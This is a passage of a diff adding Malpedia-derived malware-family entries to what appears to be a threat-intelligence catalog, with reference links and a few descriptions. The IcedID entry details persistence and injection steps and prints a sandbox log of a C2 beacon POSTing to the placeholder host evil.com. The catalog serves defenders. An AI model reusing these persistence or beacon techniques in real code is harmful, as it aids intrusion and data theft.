}, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", + "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html" + ] + }, + "uuid": "19d89300-ff97-4281-ac42-76542e744092", + "value": "Helminth", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag", + "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/", + "https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/" + ] + }, + "uuid": "bb07e153-2e51-4ce1-97a3-4ec8a936e625", + "value": "Heloag", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst", + "https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware" + ] + }, + "uuid": "ca8482d9-657b-49fe-8345-6ed962a9735a", + "value": "Herbst", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + ] + }, + "uuid": "9d4fc43c-28a1-45ea-ac2c-8d53bdce118b", + "value": "Heriplor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes", + "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + ] + }, + "uuid": "30a230c1-b598-4d06-90ab-3254d6a626d8", + "value": "Hermes", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + ] + }, + "uuid": "4d8da0af-cfd7-4990-b211-af0e9906eca0", + "value": "Hermes Ransomware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes" + ] + }, + "uuid": "4734c5a4-e63b-4bb4-8c01-ab0c638a6c21", + "value": "HerpesBot", + 
"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot" + ] + }, + "uuid": "2637315d-d31e-4b64-aa4b-2fc265b0a1a3", + "value": "HesperBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", + "https://github.com/goliate/hidden-tear", + "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", + "https://twitter.com/struppigel/status/950787783353884672" + ] + }, + "uuid": "b96be762-56a0-4407-be04-fcba76c1ff29", + "value": "HiddenTear", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" + ] + }, + "uuid": "84b30881-00bc-4206-8170-51705a8e26b1", + "value": "HideDRV", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit", + "https://www.recordedfuture.com/hidden-lynx-analysis/", + "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" + ] + }, + "uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1", + "value": "HiKit", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan", + "https://www.checkpoint.com/threatcloud-central/downloads/check-point-himan-malware-analysis.pdf" + ] + }, + "uuid": "ecad37b9-555a-4029-b181-6f272eed7154", + "value": "himan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat", + "https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat" + ] + }, + "uuid": "80987ce7-7eb7-4e55-95f8-5c7a9441acab", + "value": "Hi-Zor RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux" + ] + }, + "uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62", + "value": "HLUX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", + "value": "homefry", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot" + ] + }, + "uuid": "246f62ee-854a-45e9-8c57-34f1fb72762f", + "value": "HtBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat", + "https://www.riskiq.com/blog/labs/htprat/" + ] + }, + "uuid": "e8d1a1f3-3170-4562-9a18-cadf000e48d0", + "value": "htpRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "HUC Packet Transmit Tool" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran", + "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", + "https://www.secureworks.com/research/htran" + ] + }, + "uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8", + "value": "HTran", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser", + "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/" + 
] + }, + "uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f", + "value": "HttpBrowser", + "description": "" + }, + { + "meta": { + "synonyms": [ + "httpdr0pper" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper", + "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf", + "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787" + ] + }, + "uuid": "78336551-c18e-47ac-8bef-1c0c61c0e0a9", + "value": "httpdropper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy", + "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", + "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" + ] + }, + "uuid": "339b3e7c-7a4a-4a1a-94b6-555f15a0b265", + "value": "http_troy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "houdini" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412" + ] + }, + "uuid": "94466a80-964f-467e-b4b3-0e1375174464", + "value": "Hworm", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro", + "https://securelist.com/luckymouse-hits-national-data-center/86083/" + ] + }, + "uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5", + "value": "HyperBro", + "description": "" + }, + { + "meta": { + "synonyms": [ + "BokBot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", + 
"https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites",
+ "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid",
+ "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/",
+ "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html",
+ "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
+ "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/"
+ ]
+ },
+ "uuid": "26f5afaf-0bd7-4741-91ab-917bdd837330",
+ "value": "IcedID",
+ "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. 
waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] 
[https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2"
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader",
+ "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/",
+ "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/"
+ ]
+ },
+ "uuid": "c3be9189-f8f2-45e4-b6a3-8960fd5ffc16",
+ "value": "IcedID Downloader",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog",
+ "http://www.kz-cert.kz/page/502"
+ ]
+ },
+ "uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861",
+ "value": "Icefog",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix",
+ "https://securelist.com/ice-ix-not-cool-at-all/29111/",
+ 
"https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/"
+ ]
+ },
+ "uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3",
+ "value": "Ice IX",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey",
+ "https://isc.sans.edu/diary/22766"
+ ]
+ },
+ "uuid": "3afecded-3461-45f9-8159-e8328e56a916",
+ "value": "IDKEY",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/"
+ ]
+ },
+ "uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6",
+ "value": "IISniff",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab",
+ "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east"
+ ]
+ },
+ "uuid": "0ea585ef-bd32-4f5b-a3fe-bb48dc0956c7",
+ "value": "Imecab",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat",
+ "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/"
+ ]
+ },
+ "uuid": "53021414-97ad-4102-9cff-7a0e1997f867",
+ "value": "Imminent Monitor RAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Foudre"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy",
+ "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/",
+ "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/",
+ "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv",
+ 
"https://www.intezer.com/prince-of-persia-the-sands-of-foudre/",
+ "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/"
+ ]
+ },
+ "uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2",
+ "value": "Infy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat",
+ "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/"
+ ]
+ },
+ "uuid": "dd486e92-54fe-4306-9aab-05863cb6c6e1",
+ "value": "InnaputRAT",
+ "description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole",
+ "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/"
+ ]
+ },
+ "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420",
+ "value": "InvisiMole",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Gozi ISFB",
+ "IAP",
+ "Pandemyia"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb",
+ "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html",
+ "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb",
+ "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html",
+ "https://lokalhost.pl/gozi_tree.txt",
+ "https://www.youtube.com/watch?v=jlc7Ahp8Iqg",
+ "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245",
+ "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/",
+ 
"http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html",
+ "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
+ "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15",
+ "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html",
+ "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/"
+ ]
+ },
+ "uuid": "a171321e-4968-4ac0-8497-3250c1f0d77d",
+ "value": "ISFB",
+ "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. 
The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent",
+ "http://www.clearskysec.com/ismagent/"
+ ]
+ },
+ "uuid": "67457708-1edd-4ef1-9ec0-1c5eb7c75fe2",
+ "value": "ISMAgent",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor",
+ "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
+ "http://www.clearskysec.com/greenbug/"
+ ]
+ },
+ "uuid": "e09d8dd6-6857-4607-a0ba-9c8d2a66083b",
+ "value": "ISMDoor",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ispy_keylogger",
+ "https://www.zscaler.com/blogs/research/ispy-keylogger"
+ ]
+ },
+ "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070",
+ "value": "iSpy Keylogger",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer",
+ "https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/"
+ ]
+ },
+ "uuid": "27bab2fb-d324-42c2-9df3-669bb87c3989",
+ "value": "ISR Stealer",
+ "description": "ISR Stealer is a modified version of the Hackhound Stealer. 
It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public"
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace",
+ "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/"
+ ]
+ },
+ "uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a",
+ "value": "IsSpace",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/"
+ ]
+ },
+ "uuid": "3acb37f4-5614-4932-b12f-9f1c256895f2",
+ "value": "JackPOS",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff",
+ "http://malware-traffic-analysis.net/2017/05/16/index.html",
+ "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart",
+ "http://blog.talosintelligence.com/2017/05/jaff-ransomware.html"
+ ]
+ },
+ "uuid": "2c51a717-726b-4813-9fcc-1265694b128e",
+ "value": "Jaff",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jager_decryptor"
+ ]
+ },
+ "uuid": "13a7a2ff-c945-4b42-a112-dcf09f9ed9c9",
+ "value": "Jager Decryptor",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Reconcyc"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku",
+ "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146",
+ "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf"
+ ]
+ },
+ "uuid": 
"0f02ea79-5833-46e0-8458-c4a863a5a112",
+ "value": "Jaku",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus",
+ "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ ]
+ },
+ "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea",
+ "value": "Jasus",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw"
+ ]
+ },
+ "uuid": "910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9",
+ "value": "Jigsaw",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy",
+ "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/"
+ ]
+ },
+ "uuid": "551b568f-68fa-4483-a10c-a6452ae6289e",
+ "value": "Jimmy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap",
+ "https://www.us-cert.gov/ncas/alerts/TA18-149A",
+ "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
+ "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/"
+ ]
+ },
+ "uuid": "bbbef449-2fe6-4c25-a85c-69af9fa6208b",
+ "value": "Joanap",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao",
+ "https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/"
+ ]
+ },
+ "uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6",
+ "value": "Joao",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob",
+ "http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html"
+ ]
+ },
+ "uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631",
+ "value": "Jolob",
+ 
"description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker",
+ "http://marcmaiffret.com/vault7/"
+ ]
+ },
+ "uuid": "2e457b93-de45-4b1d-8e1d-b8d19c2c555a",
+ "value": "JQJSNICKER",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot",
+ "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+ ]
+ },
+ "uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2",
+ "value": "JripBot",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent",
+ "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ ]
+ },
+ "uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb",
+ "value": "KAgent",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany",
+ "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+ ]
+ },
+ "uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb",
+ "value": "Karagany",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader",
+ "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/",
+ "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab"
+ ]
+ },
+ "uuid": "8b33ba21-9af7-4536-bd02-23dd863147e8",
+ "value": "Kardon Loader",
+ "description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. 
The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius",
+ "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/",
+ "https://research.checkpoint.com/banking-trojans-development/"
+ ]
+ },
+ "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf",
+ "value": "Karius",
+ "description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n"
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
